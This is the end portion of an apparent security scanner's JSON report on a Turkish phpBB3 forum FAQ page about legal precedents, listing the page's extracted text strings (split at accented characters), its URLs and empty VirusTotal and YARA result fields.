            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f10r1\"></a><b>&#187; Bu yaz\u0131l\u0131m\u0131 kim T",
            "e\u2019ye terc",
            "me etti?</b></div>",
            "\t\t\t\t<div class=\"postbody\">\u201cphpBB3 T",
            "e dil dosyas\u0131\u201d bir \u201c<a href=\"http://www.canversoft.net/\" title=\"profesyonel phpBB3 ",
            "mleri ve web hizmetleri\" onclick=\"this.target='_blank'\">Canver Software</a>\u201d i\u015ftirak\u0131 olan \u201c<strong><a href=\"http://www.phpbbturkiye.net\" title=\"phpBB3 T",
            "e destek ve geli\u015ftirme\" onclick=\"this.target='_blank'\">phpBB T",
            "rkiye</a></strong>\u201d grubu taraf\u0131ndan terc",
            "me edilmi\u015f ve \u201c<a href=\"http://www.phpbbturkiye.net/hakkinda/gpl-lisansi.html\" title=\"GPL - genel kamu lisans\u0131\" onclick=\"this.target='_blank'\">GPL - genel kamu lisans\u0131</a>\u201d ile da\u011f\u0131t\u0131ma sunulmu\u015ftur. T",
            "m eser ve telif haklar\u0131 \u201cphpBB T",
            "rkiye\u201d grubuna aittir. Detayl\u0131 bilgi ve \u201cKullan\u0131m & Bulundurma Ko\u015fullar\u0131\u201d i",
            "in \u201c<a href=\"http://www.phpbbturkiye.net/dosyalar/phpbb3-dil-dosyasi.html\" onclick=\"this.target='_blank'\">Y",
            "kleme ve Kullan\u0131m K\u0131lavuzu</a>\u201d \u2019na bak\u0131n\u0131z. L",
            "tfen g",
            "zden ka",
            "an hatalar\u0131, ",
            "nerilerinizi, yorumlar\u0131n\u0131z\u0131 \u201cphpBB T",
            "rkiye\u201d sitemiz \u201cphpBB3 T",
            "e Dil Paketi\u201d b",
            "ndeki <a href=\"http://www.phpbbturkiye.net/hata-raporlari-f93/\" onclick=\"this.target='_blank'\">Hata Raporlar\u0131</a> forumuna bildiriniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row1\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f10r2\"></a><b>&#187; Neden X ",
            "zelli\u011fi yok?</b></div>",
            "\t\t\t\t<div class=\"postbody\">Bu yaz\u0131l\u0131m phpBB Grubu taraf\u0131ndan yaz\u0131lm\u0131\u015f ve lisanslanm\u0131\u015ft\u0131r. E\u011fer bir ",
            "zelli\u011fin eklenmesi gerekti\u011fine inan\u0131yorsan\u0131z, l",
            "tfen, <a href=\"http://www.phpbb.com\" onclick=\"this.target='_blank'\">phpbb.com</a> web sitesini ziyaret edin ve phpBB grubunun ne s",
            "yledi\u011fini g",
            "n. L",
            "tfen <a href=\"http://www.phpbb.com\" onclick=\"this.target='_blank'\">phpbb.com</a> adresine ",
            "zellik isteme ricas\u0131 i",
            "eren iletiler g",
            "ndermeyin, grup yeni ",
            "zelliklerin taslaklar\u0131n\u0131 SourceForge kullanarak tutmaktad\u0131r. L",
            "tfen, forumlar\u0131 okuyun ve phpBB grubunun ",
            "zerinde ",
            "al\u0131\u015ft\u0131\u011f\u0131 bir ",
            "zellik olup olmad\u0131\u011f\u0131n\u0131 g",
            "n ve sonra orada verilen prosed",
            " takip edin.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t\t\t\t\t<td class=\"row2\" valign=\"top\">",
            "\t\t\t\t\t\t\t<div class=\"postbody\"><a name=\"f10r3\"></a><b>&#187; Bu panodaki hatal\u0131 kullan\u0131m ve/veya yasal konularla ilgili olarak kimle ileti\u015fim kurmal\u0131y\u0131m?</b></div>",
            "\t\t\t\t<div class=\"postbody\">\"Y",
            "netim ekibi\" sayfas\u0131ndaki herhangi bir y",
            "netici \u015fikayetlerinizi iletebilece\u011finiz uygun ileti\u015fim noktas\u0131 olabilir. E\u011fer yine cevap alamazsan\u0131z site sahibi ile ileti\u015fime ge",
            "ebilirsiniz. E\u011fer pano ",
            "cretsiz bir servis ",
            "zerinde ",
            "al\u0131\u015f\u0131yorsa (",
            "rne\u011fin Yahoo!, free.fr, f2s.com, vb), y",
            "netim ya da k",
            " kullan\u0131m servisiyle ileti\u015fim kurabilirsiniz. Unutmay\u0131n ki; phpBB Grubu <strong>herhangi bir yetkiye sahip de\u011fildir</strong> ve hi",
            " bir \u015fekilde nas\u0131l, nerede ya da kim taraf\u0131ndan bu panonun kullan\u0131laca\u011f\u0131 ",
            "zerinde sorumluluk kabul etmez. Yasal durumlarla ilgili olarak <strong>do\u011frudan</strong> phpBB.com sitesi ile ilgili olmad\u0131k",
            "a phpBB Grubu ile ileti\u015fime ge",
            "meyin. E\u011fer phpBB Grubu ile bu yaz\u0131l\u0131m\u0131n herhangi bir 3. parti kullan\u0131m\u0131yla ilgili olarak talepte bulunursan\u0131z k\u0131sa bir cevap alabilir ya da hi",
            " bir cevap alamayabilirsiniz.</div>",
            "\t\t\t\t<p class=\"gensmall\"><a href=\"#faqtop\">Sayfa ba\u015f\u0131</a></p>",
            "\t\t\t</td>",
            "\t\t</tr>",
            "\t\t<tr>",
            "\t\t\t<td class=\"spacer\" height=\"1\"><img src=\"images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" /></td>",
            "\t\t</tr>",
            "\t\t\t\t</table>",
            "\t\t<br clear=\"all\" />",
            "</div>",
            "<table class=\"tablebg\" width=\"100%\" cellspacing=\"1\" cellpadding=\"0\" style=\"margin-top: 5px;\">",
            "\t<tr>",
            "\t\t<td class=\"row1\">",
            "\t\t\t<p class=\"breadcrumbs\"><a href=\"./index.php?sid=be5e639d613864d0d431e01d68ce6fbd\">Pano anasayfas\u0131</a></p>",
            "\t\t\t<p class=\"datetime\">T",
            "m zamanlar UTC + 2 saat </p>",
            "\t\t</td>",
            "\t</tr>",
            "\t</table>",
            "<br clear=\"all\" />",
            "<div align=\"right\">\t<form method=\"post\" name=\"jumpbox\" action=\"./viewforum.php?sid=be5e639d613864d0d431e01d68ce6fbd\" onsubmit=\"if(document.jumpbox.f.value == -1){return false;}\">",
            "\t<table cellspacing=\"0\" cellpadding=\"0\" border=\"0\">",
            "\t<tr>",
            "\t\t<td nowrap=\"nowrap\"><span class=\"gensmall\">Git:</span>&nbsp;<select name=\"f\" onchange=\"if(this.options[this.selectedIndex].value != -1){ document.forms['jumpbox'].submit() }\">",
            "\t\t\t\t\t<option value=\"-1\">Forum se",
            "iniz</option>",
            "\t\t<option value=\"-1\">------------------</option>\t\t\t<option value=\"1\">EMSAL KARARLAR VE \u0130",
            "T\u0130HATLAR</option>",
            "\t\t\t\t\t<option value=\"2\">&nbsp; &nbsp;EMSAL KARARLAR VE \u0130",
            "T\u0130HATLAR ADLI S\u0130TEN\u0130N KURULU\u015e AMACI</option>",
            "\t\t\t\t\t<option value=\"4\">&nbsp; &nbsp;EMSAL KARARLAR VE \u0130",
            "T\u0130HATLAR BU FORUMDA TOPLANMAKTA VE TARTI\u015eILMAKTADIR</option>",
            "\t\t\t\t\t<option value=\"12\">&nbsp; &nbsp;EMSAL KARAR VE \u0130",
            "T\u0130HATLAR 1 - DANI\u015eTAY KARARLARI</option>",
            "\t\t\t\t\t<option value=\"13\">&nbsp; &nbsp;EMSAL KARAR VE \u0130",
            "T\u0130HATLAR 2 - YARGITAY KARARLARI</option>",
            "\t\t\t\t\t<option value=\"14\">&nbsp; &nbsp;EMSAL KARAR VE \u0130",
            "T\u0130HATLAR 3 - ANAYASA MAHKEMES\u0130 KARARLARI</option>",
            "\t\t\t\t\t<option value=\"15\">&nbsp; &nbsp;\u0130",
            "T\u0130HAT S",
            "N ANLAMI VE HUKUK ALEM\u0130NDEK\u0130 ",
            "NEM\u0130 HK.</option>",
            "\t\t\t\t\t<option value=\"6\">AVRUPA \u0130NSAN HAKLARI MAHKEMES\u0130 KARARLARI</option>",
            "\t\t\t\t\t<option value=\"7\">&nbsp; &nbsp;A\u0130HM KARARLARI - GENEL</option>",
            "\t\t\t\t\t<option value=\"17\">&nbsp; &nbsp;\u0130",
            "T\u0130HAT N\u0130TEL\u0130\u011e\u0130NDEK\u0130 A\u0130HM KARARLARI</option>",
            "\t\t\t\t\t<option value=\"10\">SU",
            " DUYURULARI</option>",
            "\t\t\t\t\t<option value=\"11\">&nbsp; &nbsp;SU",
            " DUYURULARI NASIL YAPILIR?</option>",
            "\t\t\t\t\t<option value=\"8\">DUYURULAR VE \u0130LANLAR</option>",
            "\t\t\t\t\t<option value=\"9\">&nbsp; &nbsp;",
            "YE VE M\u0130SAF\u0130RLER\u0130M\u0130ZE Y",
            "NEL\u0130K DUYURULAR VE \u0130LANLAR</option>",
            "\t\t</select>&nbsp;<input class=\"btnlite\" type=\"submit\" value=\"Git\" /></td>",
            "\t</tr>",
            "\t</table>",
            "\t</form>",
            "</div>",
            "<img src=\"./cron.php?cron_type=tidy_search&amp;sid=be5e639d613864d0d431e01d68ce6fbd\" width=\"1\" height=\"1\" alt=\"cron\" /></div>",
            "<!--",
            "\tWe request you retain the full copyright notice below including the link to www.phpbb.com.",
            "\tThis not only gives respect to the large amount of time given freely by the developers",
            "\tbut also helps build interest, traffic and use of phpBB3. If you (honestly) cannot retain",
            "\tthe full copyright we ask you at least leave in place the \"Powered by phpBB\" line, with",
            "\t\"phpBB\" linked to www.phpbb.com. If you refuse to include even this then support on our",
            "\tforums may be affected.",
            "\tThe phpBB Group : 2006",
            "//-->",
            "<div id=\"wrapfooter\">",
            "\t\t<span class=\"copyright\">Powered by <a href=\"http://www.phpbb.com/\">phpBB</a> &copy; 2000, 2002, 2005, 2007 phpBB Group",
            "\t<br />phpBB3 T",
            "e: <a href=\"http://www.phpbbturkiye.net\" title=\"phpBB3 geli\u015ftirme ve destek\" onclick=\"this.target='_blank'\" rel=\"external\">phpBB T",
            "rkiye</a></span>",
            "</div>",
            "</body>",
            "</html>"
        ],
        "file": {},
        "fuzzing": {},
        "ip": [],
        "url": [
            "http://www.phpbbturkiye.net/dosyalar/phpbb3-dil-dosyasi.html",
            "http://www.canversoft.net/",
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd",
            "http://www.phpbbturkiye.net/hata-raporlari-f93/",
            "http://www.phpbb.com",
            "http://www.example.com/my-picture.gif",
            "http://www.phpbbturkiye.net",
            "http://www.phpbb.com/",
            "http://www.phpbbturkiye.net/hakkinda/gpl-lisansi.html",
            "http://www.w3.org/1999/xhtml"
        ]
    },
    "time": "0:00:00.802502",
    "version": "6.0.3",
    "virustotal": {
        "positives": "",
        "total": ""
    },
    "yara_plugins": []
}
